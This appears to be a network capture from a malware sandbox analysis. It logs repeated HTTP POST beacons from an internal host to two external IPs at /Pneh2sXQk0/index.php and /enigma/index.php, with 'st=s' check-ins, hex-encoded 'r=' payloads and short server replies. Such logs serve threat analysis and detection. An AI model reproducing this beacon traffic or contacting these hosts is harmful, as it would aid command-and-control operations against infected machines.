                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:35:54.075052023 CEST | 196 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 19 Apr 2024 01:35:53 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port
1290 | 192.168.2.5 | 51144 | 193.233.132.56 | 80
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:35:54.317645073 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 193.233.132.56
Content-Length: 156
Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:35:54.571146965 CEST | 196 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 19 Apr 2024 01:35:54 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port
1291 | 192.168.2.5 | 51145 | 193.233.132.167 | 80
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:35:54.426935911 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 193.233.132.167
Content-Length: 4
Cache-Control: no-cache
Data Raw: 73 74 3d 73
Data Ascii: st=s
Apr 19, 2024 03:35:54.670650959 CEST | 197 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 19 Apr 2024 01:35:54 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
Data Ascii: 8 <c>3<d>0
Apr 19, 2024 03:35:54.674711943 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 193.233.132.167
Content-Length: 156
Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:35:54.924424887 CEST | 196 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 19 Apr 2024 01:35:54 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port
1292 | 192.168.2.5 | 51146 | 193.233.132.56 | 80
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:35:54.915105104 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 193.233.132.56
Content-Length: 4
Cache-Control: no-cache
Data Raw: 73 74 3d 73
Data Ascii: st=s
Apr 19, 2024 03:35:55.160861015 CEST | 219 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 19 Apr 2024 01:35:55 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Refresh: 0; url = Login.php
Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
Data Ascii: 1 0


Session ID | Source IP | Source Port | Destination IP | Destination Port
1293 | 192.168.2.5 | 51147 | 193.233.132.167 | 80
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:35:55.271277905 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:35:55.516779900 CEST | 197 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:55 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port
1294 | 192.168.2.5 | 51148 | 193.233.132.56 | 80
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:35:55.413913012 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:35:55.665287971 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:55 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port
1295 | 192.168.2.5 | 51149 | 193.233.132.167 | 80
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:35:55.771285057 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:35:56.025346994 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:55 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port
1296 | 192.168.2.5 | 51150 | 193.233.132.56 | 80
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:35:56.011758089 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:35:56.259736061 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:56 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


Session ID | Source IP | Source Port | Destination IP | Destination Port
1297 | 192.168.2.5 | 51151 | 193.233.132.167 | 80
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:35:56.381423950 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:35:56.625293016 CEST | 197 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:56 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port
1298 | 192.168.2.5 | 51152 | 193.233.132.56 | 80
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:35:56.515048027 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:35:56.770658016 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:56 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port
1299 | 192.168.2.5 | 51153 | 193.233.132.167 | 80
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:35:56.872944117 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:35:57.120807886 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:56 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port
1300 | 192.168.2.5 | 51154 | 193.233.132.56 | 80
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:35:57.119616985 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:35:57.367763042 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:57 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


Session ID | Source IP | Source Port | Destination IP | Destination Port
1301 | 192.168.2.5 | 51155 | 193.233.132.167 | 80
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:35:57.478259087 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:35:57.726172924 CEST | 197 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:57 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port
1302 | 192.168.2.5 | 51156 | 193.233.132.56 | 80
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:35:57.627012968 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:35:57.882671118 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:57 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port
1303 | 192.168.2.5 | 51157 | 193.233.132.167 | 80
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:35:57.978913069 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:35:58.232273102 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:58 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port
1304 | 192.168.2.5 | 51158 | 193.233.132.56 | 80
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:35:58.231426001 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:35:58.483089924 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:58 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


Session ID | Source IP | Source Port | Destination IP | Destination Port
1305 | 192.168.2.5 | 51159 | 193.233.132.167 | 80
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:35:58.580486059 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:35:58.818104982 CEST | 197 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:58 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port
1306 | 192.168.2.5 | 51160 | 193.233.132.56 | 80
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:35:58.733251095 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:35:58.981889009 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:58 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port
1307 | 192.168.2.5 | 51161 | 193.233.132.167 | 80
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:35:59.069010973 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:35:59.316235065 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:59 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port
1308 | 192.168.2.5 | 51162 | 193.233.132.56 | 80
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:35:59.329032898 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
